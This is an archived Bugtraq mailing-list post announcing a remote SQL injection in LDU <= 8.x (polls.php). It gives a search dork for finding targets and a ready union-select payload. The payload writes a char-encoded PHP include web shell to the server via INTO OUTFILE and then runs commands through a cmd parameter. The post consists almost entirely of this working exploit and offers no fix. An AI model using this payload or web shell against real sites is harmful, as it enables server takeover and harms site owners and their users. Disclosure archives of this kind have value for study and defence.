| To: | bugtraq@securityfocus.com |
|---|---|
| Subject: | LDU <= 8.x (polls.php) Remote SQL Injection Vulnerability |
| From: | ajannhwt@hotmail.com |
| Date: | 30 Nov 2006 15:36:57 -0000 |
| Delivered-to: | sp-com-lists@consult.net |
| Delivered-to: | bugtraq-list@securepoint.com |
| Delivered-to: | mailing list bugtraq@securityfocus.com |
| Delivered-to: | moderator for bugtraq@securityfocus.com |
| List-help: | <mailto:bugtraq-help@securityfocus.com> |
| List-id: | <bugtraq.list-id.securityfocus.com> |
| List-post: | <mailto:bugtraq@securityfocus.com> |
| List-subscribe: | <mailto:bugtraq-subscribe@securityfocus.com> |
| List-unsubscribe: | <mailto:bugtraq-unsubscribe@securityfocus.com> |
| Mailing-list: | contact bugtraq-help@securityfocus.com; run by ezmlm |
******************************************************************************* # Title : LDU <= 8.x (polls.php) Remote SQL Injection Vulnerability # Author : ajann # Contact : :( # Dork : "Powered by LDU" ******************************************************************************* [[SQL]]]------------------------------------------------------ ### http://[target]/[path]/polls.php?id= Example: // polls.php?id='union%20select%200,0,0,0,char(60,63,105,110,99,108,117,100,101,40,36,99,109,100,41,59,63,62)%20from%20sed_users%20INTO%20OUTFILE%20'[path]/.php'/* .php?cmd=[shell] """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker! |
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | contentserv 4.x, capt . nem0 |
|---|---|
| Next by Date: | iDefense Security Advisory 11.30.06: Multiple Vendor libgsf Heap Overflow Vulnerability, iDefense Labs |
| Previous by Thread: | contentserv 4.x, capt . nem0 |
| Next by Thread: | iDefense Security Advisory 11.30.06: Multiple Vendor libgsf Heap Overflow Vulnerability, iDefense Labs |
| Indexes: | [Date] [Thread] [Top] [All Lists] |